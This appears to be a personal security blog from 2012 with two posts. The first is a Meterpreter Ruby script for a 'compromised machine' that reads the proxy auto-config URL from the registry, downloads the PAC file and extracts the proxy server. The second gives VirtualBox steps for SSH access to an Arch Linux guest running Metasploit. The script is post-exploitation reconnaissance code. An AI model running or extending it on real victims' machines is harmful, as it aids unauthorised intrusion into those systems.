Sunday, 12 February 2012

Reading proxy auto config (pac) file with meterpreter





Since i am a web-security person (duh duh), please pardon me if you find this erroneous or useless.

The following meterpreter script is an example of reading proxy auto config file (pac) to check for the proxy servers being used by compromised machine.

Tested on Windows XP only.
#This is just a concept of reading pac file from the compromised machine.
#You can take the stuff ahead from here :-)
#oldmanlab@gmail.com

#Variable initialization
session = client

if session.platform =~ /win32|win64/

           #Read the key and the get the AutoConfig URL
           open_key = session.sys.registry.open_key(HKEY_CURRENT_USER, 'Software\Microsoft\Windows\CurrentVersion
                      \Internet Settings', KEY_READ)
           begin
                 url = open_key.query_value('AutoConfigURL').data
                 print_status('Reading pac file.....')

                 #Download the pac file
                 session.railgun.add_dll('urlmon','urlmon')
                 session.railgun.add_function('urlmon', 'URLDownloadToFileW', 'DWORD', [['PBLOB', 'pCaller', 'in'],
                 ['PWCHAR','szURL','in'],['PWCHAR','szFileName','in'],['DWORD','dwReserved','in'],['PBLOB','lpfnCB','inout']])
                 session.railgun.urlmon.URLDownloadToFileW(nil,url,'proxy.pac',0,nil)

                 #Read the file and search for the proxy servers
                 proxy_data = ''
                 temp = session.fs.file.new('proxy.pac','rb')
                 until temp.eof?
                           proxy_data << temp.read
                 end
                 proxy_host = proxy_data.match(/PROXY(.*)";/)[1]
                 print_status('The proxy server is:'+proxy_host)

           rescue
                 print_status('No pac file found')

           end
else
           print_status('Victim is not using Windows')
end

I never did code in ruby before so any suggestions are welcome.

Wednesday, 8 February 2012

SSH access to archlinux guest in virtualbox

For me having metasploit framework installed on headless and light operating system whose memory thirst can be quench with 50-80 MB RAM was a point to install arch linux.

This post shows quick dirty steps to configure virtualbox to access SSH on arch linux guest with NAT.

Environment:

Host : Windows
Guest: Arch linux 64bit
VirtualBox: 4.1.8

Poweroff your guest operating system. Go to settings of your guest and select Network. Setup Adapter1 as NAT and Adapter2 as Host-Only Adapter. Refer following screenshots



Ipconfig on my windows host shows the following configuration


PowerOn your guest. Login as root user and setup another interface with the following command

ifconfig eth1 inet 192.168.7.2 netmask 255.255.255.0 up

From your host system, you now will be able to ping 192.168.7.2 and can even ssh 192.168.7.2 with your ssh client like PuTTY.